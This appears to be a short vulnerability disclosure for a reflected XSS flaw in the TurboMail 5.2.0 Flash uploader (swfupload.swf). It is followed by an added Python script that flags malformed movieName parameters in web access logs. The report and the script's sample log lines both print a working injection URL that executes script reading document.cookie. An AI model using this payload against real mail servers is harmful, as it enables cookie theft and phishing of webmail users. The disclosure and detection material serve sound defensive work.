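### Summary:
The latest version of the TurboMail mail system has an XSS vulnerability that can be used for phishing, stealing cookies, and so on.
### Details:
Version: latest release 5.2.0, deployed on Windows Server
The vulnerable file is
C:\turbomail\web\webapps\ROOT\enterprise\swfupload\swfupload.swf
This version has an XSS flaw; see CVE-2012-3414.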
http://mail.fuck.com:8080/enterprise/swfupload/swfupload/swfupload.swf?movieName=%22%5d%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28document.cookie%29;//
![ssv.png](https://images.seebug.org/upload/201412/21231543e3d5323acc40e0e57f14953dafe17b65.png)
![t1.png](https://images.seebug.org/upload/201412/21231435a93e9ff8afab88501cb6f801ff6b8029.png)
### Proof of concept:
See above.
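
A detection sketch for the issue described above, added here as an example (not part of the original report or of TurboMail's code): it scans web access-log lines for requests to `swfupload.swf` whose `movieName` parameter is not a plain identifier. The log lines are constructed samples, and the identifier allowlist is an assumption about what legitimate `movieName` values look like.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate movieName is a short identifier such as "SWFUpload_0".
SAFE_MOVIE_NAME = re.compile(r"[A-Za-z0-9_.\-]{1,64}")
# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2015:10:00:00 +0800] '
    '"GET /enterprise/swfupload/swfupload.swf?movieName=SWFUpload_0 HTTP/1.1" 200 12800',
    '203.0.113.9 - - [01/Jan/2015:10:00:07 +0800] '
    '"GET /enterprise/swfupload/swfupload/swfupload.swf?movieName=%22%5d%29;}catch%28e%29{}'
    'if%28!self.a%29self.a=!alert%28document.cookie%29;// HTTP/1.1" 200 12800',
    '203.0.113.9 - - [01/Jan/2015:10:00:09 +0800] '
    '"GET /enterprise/index.jsp?movieName=%22x HTTP/1.1" 200 512',
]

def suspicious_movie_names(log_lines):
    """Return (line_no, decoded movieName) for swfupload.swf requests whose
    movieName falls outside the identifier allowlist."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/swfupload.swf"):
            continue  # only the Flash uploader is of interest here
        # parse_qs percent-decodes values, so encoded quotes/brackets are seen in clear.
        for value in parse_qs(url.query, keep_blank_values=True).get("movieName", []):
            if not SAFE_MOVIE_NAME.fullmatch(value):
                hits.append((line_no, value))
    return hits

if __name__ == "__main__":
    for line_no, value in suspicious_movie_names(SAMPLE_LOG):
        print(f"line {line_no}: suspicious movieName {value!r}")
```

The same allowlist can be enforced in a reverse proxy or WAF rule in front of the mail server until the bundled `swfupload.swf` is replaced or removed.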